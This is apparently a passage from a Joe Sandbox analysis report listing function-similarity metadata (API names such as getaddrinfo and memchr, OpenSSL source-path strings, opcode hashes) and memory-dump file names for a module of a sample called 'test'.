                                                                                                                                                                • Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _time64
                                                                                                                                                                • String ID: %02d%02d%02d%02d%02d%02dZ$%04d%02d%02d%02d%02d%02dZ
                                                                                                                                                                • API String ID: 1670930206-2648760357
                                                                                                                                                                • Opcode ID: e7835e309f0b97ef489bbfb2a8574afe71228629844293782e8a4b88eb11b92d
                                                                                                                                                                • Instruction ID: 8454bb8e6d27f3f25f9ed6421ce4b818e1299f684123d86123185943a4912661
                                                                                                                                                                • Opcode Fuzzy Hash: e7835e309f0b97ef489bbfb2a8574afe71228629844293782e8a4b88eb11b92d
                                                                                                                                                                • Instruction Fuzzy Hash: 08517D72B0C7858AE764CB19F49026EB7A0FB98780F584135EB8D87B59EF3CE4419B00
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: getaddrinfo
                                                                                                                                                                • String ID: ..\s\crypto\bio\b_addr.c
                                                                                                                                                                • API String ID: 300660673-2547254400
                                                                                                                                                                • Opcode ID: 235723b66d282f098a6fbed6f894c7b970b2fa5fbfaa8cc020faa70d78bfa678
                                                                                                                                                                • Instruction ID: 722216ce105fcd2af3090c1da1ee4e229c497024b006cc40992dadef001b22aa
                                                                                                                                                                • Opcode Fuzzy Hash: 235723b66d282f098a6fbed6f894c7b970b2fa5fbfaa8cc020faa70d78bfa678
                                                                                                                                                                • Instruction Fuzzy Hash: 8741B873B1868A87EB589F16B4906BDB7A1FB94784F004135EB8A43B85DF3CE445BB40
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLastgetsockname
                                                                                                                                                                • String ID: ..\s\crypto\bio\b_sock.c
                                                                                                                                                                • API String ID: 566540725-540685895
                                                                                                                                                                • Opcode ID: e1c81a765875b987af6ce7381e9c39fea55679f384358aa352923a1f1ce32b8d
                                                                                                                                                                • Instruction ID: 3bfb88c5979ec1666a3f0783bc7d2ac897cf31a6502ec2b58e5a217044956d6f
                                                                                                                                                                • Opcode Fuzzy Hash: e1c81a765875b987af6ce7381e9c39fea55679f384358aa352923a1f1ce32b8d
                                                                                                                                                                • Instruction Fuzzy Hash: 232190B6B0814AD6E725DB20E8656ED7360FF80304F840231E76C43A95DF3DE589EB40
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLastioctlsocket
                                                                                                                                                                • String ID: ..\s\crypto\bio\b_sock.c
                                                                                                                                                                • API String ID: 1021210092-540685895
                                                                                                                                                                • Opcode ID: 60a1ab62464ec2a0ac3dda5e3f28e7a2988a3f697a3705fb2a2132065268ab70
                                                                                                                                                                • Instruction ID: 581d40725691655526b4c6309f48319c5746a3baf1354b6beb656b4e82ebd8fc
                                                                                                                                                                • Opcode Fuzzy Hash: 60a1ab62464ec2a0ac3dda5e3f28e7a2988a3f697a3705fb2a2132065268ab70
                                                                                                                                                                • Instruction Fuzzy Hash: 92E0D895B0954B87F71A5B60E874B7D1310AF84304F000134EF1DC2691DF3DF149A601
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memchr.VCRUNTIME140(00007FFD3FE1B0FB,00000000,?,00000000,00007FFD3FE1A399), ref: 00007FFD3FE1B2CB
                                                                                                                                                                • memchr.VCRUNTIME140(00007FFD3FE1B0FB,00000000,?,00000000,00007FFD3FE1A399), ref: 00007FFD3FE1B313
                                                                                                                                                                • memchr.VCRUNTIME140(00007FFD3FE1B0FB,00000000,?,00000000,00007FFD3FE1A399), ref: 00007FFD3FE1B32D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memchr
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3297308162-0
                                                                                                                                                                • Opcode ID: e221e4df5d2fb403f53de0e259801b9ae333423dbc6769aefdf0bcf9ba463014
                                                                                                                                                                • Instruction ID: 5dcb10c62d986749a5643e8c892569aefbdb855d31880017d62f8cbbf9d2875b
                                                                                                                                                                • Opcode Fuzzy Hash: e221e4df5d2fb403f53de0e259801b9ae333423dbc6769aefdf0bcf9ba463014
                                                                                                                                                                • Instruction Fuzzy Hash: FB910861B0868982EB189B17D4A017DA7A0FBC9FC4F588035DF8D93B96CE3EE855D700
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memmove
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2162964266-0
                                                                                                                                                                • Opcode ID: 76854a5fe0e60425e535bb1bcb9eac985b2d474becd93fe018a8b42bb91e7afe
                                                                                                                                                                • Instruction ID: 7806a3e2b7fff18afe6bea40b5bd3edb473fd01d1bbea04dea83d53fcd418057
                                                                                                                                                                • Opcode Fuzzy Hash: 76854a5fe0e60425e535bb1bcb9eac985b2d474becd93fe018a8b42bb91e7afe
                                                                                                                                                                • Instruction Fuzzy Hash: 4A11BF62B04A8592D714EB1AE1901EDA360FF847D0F448132FB9E87B96EF28E5E1D300
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%